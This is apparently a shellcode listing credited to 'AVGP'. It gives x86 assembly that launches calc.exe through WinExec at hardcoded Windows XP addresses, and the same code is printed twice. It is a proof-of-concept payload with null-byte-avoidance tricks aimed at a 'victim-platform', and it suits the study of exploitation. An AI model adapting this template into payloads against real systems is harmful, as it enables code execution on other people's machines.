AVGP/Windows calc.exe Shellcode

## Windows calc.exe Shellcode
[SECTION .text]
global _start
_start:
	jmp short getData
execIt:
	pop ebx			;Get the string off stack
	xor eax,eax		;Clear eax
	mov [ebx+8],al		;This helps us to avoid having a zero byte in our code.
				;It sets the terminator to the string.
	push eax	        ;Second argument for WinExec
	push ebx		;Use this as first argument for WinExec
	mov eax,0x7c8623ad	;This is the address of the function.
				;You need to find it out for the desired victim-platform.
				;It changes only between different Windows versions
				;and patch levels. This reflects the address on
				;my VirtualBox running some XP. I don't give a damn on its
				;patchlevel, because its insulated.
	call eax		;Call it!

end:				;now we clean up a bit
	xor eax,eax
	push eax
	mov eax,0x7c81cafa	;The address of ExitProcess on my VirtualBox, running XP
	call eax		;Good bye!
getData:
	call execIt		;Get the following string on stack.
	db 'calc.exe0'
	[SECTION .text]
	global _start
	_start:
	jmp short getData
	execIt:
	pop ebx ;Get the string off stack
	xor eax,eax ;Clear eax
	mov [ebx+8],al ;This helps us to avoid having a zero byte in our code.
	;It sets the terminator to the string.
	push eax ;Second argument for WinExec
	push ebx ;Use this as first argument for WinExec
	mov eax,0x7c8623ad ;This is the address of the function.
	;You need to find it out for the desired victim-platform.
	;It changes only between different Windows versions
	;and patch levels. This reflects the address on
	;my VirtualBox running some XP. I don't give a damn on its
	;patchlevel, because its insulated.
	call eax ;Call it!

	end: ;now we clean up a bit
	xor eax,eax
	push eax
	mov eax,0x7c81cafa ;The address of ExitProcess on my VirtualBox, running XP
	call eax ;Good bye!
	getData:
	call execIt ;Get the following string on stack.
	db 'calc.exe0'